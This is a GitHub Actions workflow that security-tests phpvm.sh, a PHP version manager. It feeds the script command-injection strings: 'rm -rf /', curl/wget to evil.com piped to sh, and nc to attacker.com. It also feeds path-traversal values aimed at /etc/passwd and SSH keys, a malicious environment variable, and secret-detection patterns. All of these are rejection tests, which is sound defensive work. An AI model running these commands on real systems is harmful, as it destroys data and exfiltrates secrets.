fix: update changelog header to include comparison link for v1.6.0 re⦠#8
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| name: Security and Vulnerability Testing | |
| on: | |
| push: | |
| branches: [main, development] | |
| pull_request: | |
| branches: [main, development] | |
| schedule: | |
| # Run weekly security checks | |
| - cron: '0 1 * * 1' | |
| jobs: | |
| security-scan: | |
| name: Security Vulnerability Scan | |
| runs-on: ubuntu-latest | |
| steps: | |
| - name: Checkout Repository | |
| uses: actions/checkout@v4 | |
| - name: Install Security Tools | |
| run: | | |
| # Install shellcheck for security analysis | |
| sudo apt-get update | |
| sudo apt-get install -y shellcheck | |
| - name: Security-focused ShellCheck | |
| run: | | |
| echo "=== Security-focused Shell Analysis ===" | |
| # Run shellcheck with security focus | |
| shellcheck -f gcc -S error phpvm.sh || true | |
| # Check for specific security patterns | |
| echo "Checking for potential security issues..." | |
| # Check for unsafe eval usage | |
| if grep -n "eval" phpvm.sh; then | |
| echo "Found eval usage - review for security" | |
| fi | |
| # Check for unsafe rm operations | |
| if grep -n "rm -rf \$" phpvm.sh; then | |
| echo "Found variable-based rm -rf - review for safety" | |
| fi | |
| # Check for direct sudo usage without validation | |
| if grep -n "sudo.*\$" phpvm.sh | grep -v "run_with_sudo"; then | |
| echo "Found direct sudo with variables - review for safety" | |
| fi | |
| - name: Input Validation Security Test | |
| run: | | |
| chmod +x ./phpvm.sh | |
| echo "=== Testing Input Validation Security ===" | |
| # Test command injection attempts | |
| malicious_inputs=( | |
| "8.1; rm -rf /" | |
| "8.1 && curl http://evil.com" | |
| "8.1 | nc attacker.com 1234" | |
| "\$(whoami)" | |
| "\`id\`" | |
| "8.1 > /etc/passwd" | |
| "8.1; cat /etc/shadow" | |
| "../../../etc/passwd" | |
| "8.1 || wget http://evil.com/script.sh -O - | sh" | |
| ) | |
| for input in "${malicious_inputs[@]}"; do | |
| echo "Testing malicious input: $input" | |
| if ./phpvm.sh install "$input" 2>/dev/null; then | |
| echo "SECURITY ISSUE: Accepted malicious input: $input" | |
| exit 1 | |
| else | |
| echo "Correctly rejected: $input" | |
| fi | |
| done | |
| - name: Path Traversal Security Test | |
| run: | | |
| echo "=== Testing Path Traversal Protection ===" | |
| # Test directory traversal in .phpvmrc | |
| mkdir -p security_test | |
| # Path traversal attempts | |
| path_traversal_inputs=( | |
| "../../../etc/passwd" | |
| "../../root/.ssh/id_rsa" | |
| "/etc/shadow" | |
| "..\\..\\windows\\system32\\config\\sam" | |
| "....//....//etc//passwd" | |
| ) | |
| for input in "${path_traversal_inputs[@]}"; do | |
| echo "$input" > security_test/.phpvmrc | |
| cd security_test | |
| if ../phpvm.sh auto 2>/dev/null; then | |
| echo "SECURITY ISSUE: Accepted path traversal: $input" | |
| exit 1 | |
| else | |
| echo "Correctly rejected path traversal: $input" | |
| fi | |
| cd .. | |
| done | |
| - name: File Permission Security Test | |
| run: | | |
| echo "=== Testing File Permission Security ===" | |
| # Test with various .phpvmrc permissions | |
| mkdir -p perm_test | |
| echo "8.1" > perm_test/.phpvmrc | |
| # Test with world-writable .phpvmrc | |
| chmod 777 perm_test/.phpvmrc | |
| cd perm_test | |
| ../phpvm.sh auto || echo "Handled world-writable .phpvmrc" | |
| cd .. | |
| # Test with unreadable .phpvmrc | |
| chmod 000 perm_test/.phpvmrc | |
| cd perm_test | |
| if ../phpvm.sh auto 2>/dev/null; then | |
| echo "Should have failed with unreadable .phpvmrc" | |
| exit 1 | |
| else | |
| echo "Correctly handled unreadable .phpvmrc" | |
| fi | |
| cd .. | |
| - name: Environment Variable Security Test | |
| run: | | |
| echo "=== Testing Environment Variable Security ===" | |
| # Test with malicious environment variables | |
| export PHPVM_DIR="/tmp/malicious; rm -rf /" | |
| if ./phpvm.sh version 2>/dev/null; then | |
| echo "Script executed with malicious PHPVM_DIR" | |
| else | |
| echo "Handled malicious PHPVM_DIR safely" | |
| fi | |
| # Reset environment | |
| unset PHPVM_DIR | |
| - name: Symlink Security Test | |
| run: | | |
| echo "=== Testing Symlink Security ===" | |
| # Test symlink attacks | |
| mkdir -p symlink_test | |
| echo "8.1" > symlink_test/legitimate.phpvmrc | |
| # Create symlink to sensitive file | |
| ln -s /etc/passwd symlink_test/.phpvmrc | |
| cd symlink_test | |
| if ../phpvm.sh auto 2>/dev/null; then | |
| echo "Script followed symlink to /etc/passwd" | |
| else | |
| echo "Safely handled symlink attack" | |
| fi | |
| cd .. | |
| privilege-escalation-test: | |
| name: Privilege Escalation Tests | |
| runs-on: ubuntu-latest | |
| steps: | |
| - name: Checkout Repository | |
| uses: actions/checkout@v4 | |
| - name: Test Privilege Escalation Prevention | |
| run: | | |
| chmod +x ./phpvm.sh | |
| echo "=== Testing Privilege Escalation Prevention ===" | |
| # Test running as non-root user | |
| # Ensure script doesn't inappropriately escalate privileges | |
| # Create a test user (this simulates running as non-root) | |
| # Note: In GitHub Actions, we're already non-root | |
| # Test sudo usage validation | |
| if grep -n "sudo" phpvm.sh | grep -v "run_with_sudo"; then | |
| echo "Found sudo usage outside of run_with_sudo helper" | |
| fi | |
| # Ensure run_with_sudo function exists and is used properly | |
| if ! grep -q "run_with_sudo()" phpvm.sh; then | |
| echo "run_with_sudo function not found" | |
| exit 1 | |
| fi | |
| echo "Privilege escalation tests passed" | |
| - name: Test Sudo Command Validation | |
| run: | | |
| echo "=== Testing Sudo Command Validation ===" | |
| # Check that run_with_sudo properly validates commands | |
| # Look for any direct variable expansion in sudo calls | |
| if grep -n "sudo.*\$[^{]" phpvm.sh | grep -v "run_with_sudo"; then | |
| echo "Found potentially unsafe sudo variable expansion" | |
| fi | |
| echo "Sudo validation tests completed" | |
| code-quality-security: | |
| name: Code Quality and Security Standards | |
| runs-on: ubuntu-latest | |
| steps: | |
| - name: Checkout Repository | |
| uses: actions/checkout@v4 | |
| - name: Check for Hardcoded Secrets | |
| run: | | |
| echo "=== Checking for Hardcoded Secrets ===" | |
| # Check for potential secrets or credentials | |
| secret_patterns=( | |
| "password" | |
| "secret" | |
| "key.*=" | |
| "token" | |
| "api.*key" | |
| "auth.*token" | |
| ) | |
| for pattern in "${secret_patterns[@]}"; do | |
| if grep -i "$pattern" phpvm.sh; then | |
| echo "Found potential secret pattern: $pattern" | |
| fi | |
| done | |
| echo "Secret scanning completed" | |
| - name: Check Error Handling Security | |
| run: | | |
| echo "=== Checking Error Handling Security ===" | |
| # Ensure errors don't leak sensitive information | |
| if grep -n "echo.*\$" phpvm.sh | grep -i "error"; then | |
| echo "Found error messages that might leak information" | |
| fi | |
| # Check for proper error code usage | |
| if ! grep -q "return 1" phpvm.sh; then | |
| echo "No proper error returns found" | |
| exit 1 | |
| fi | |
| echo "Error handling security check completed" | |
| - name: Validate Safe Defaults | |
| run: | | |
| echo "=== Validating Safe Defaults ===" | |
| # Check that DEBUG defaults to false | |
| if ! grep -q "DEBUG=false" phpvm.sh; then | |
| echo "DEBUG should default to false" | |
| exit 1 | |
| fi | |
| # Check for safe directory defaults | |
| if ! grep -q "PHPVM_DIR.*HOME" phpvm.sh; then | |
| echo "PHPVM_DIR should default to user's home directory" | |
| exit 1 | |
| fi | |
| echo "Safe defaults validation completed" | |
| penetration-test: | |
| name: Security Testing | |
| runs-on: ubuntu-latest | |
| steps: | |
| - name: Checkout Repository | |
| uses: actions/checkout@v4 | |
| - name: Buffer Overflow and Input Validation Test | |
| run: | | |
| chmod +x ./phpvm.sh | |
| echo "=== Testing Security Vulnerabilities ===" | |
| # Test with extremely long inputs | |
| very_long_input=$(printf 'A%.0s' {1..1000}) | |
| if ./phpvm.sh install "$very_long_input" 2>/dev/null; then | |
| echo "SECURITY ISSUE: Accepted extremely long input" | |
| exit 1 | |
| else | |
| echo "Correctly rejected extremely long input" | |
| fi | |
| # Test concurrent operations and state validation | |
| mkdir -p ~/.phpvm | |
| echo "corrupted_state" > ~/.phpvm/active_version | |
| ./phpvm.sh list || echo "Handled corrupted state gracefully" | |
| echo "Security tests completed" |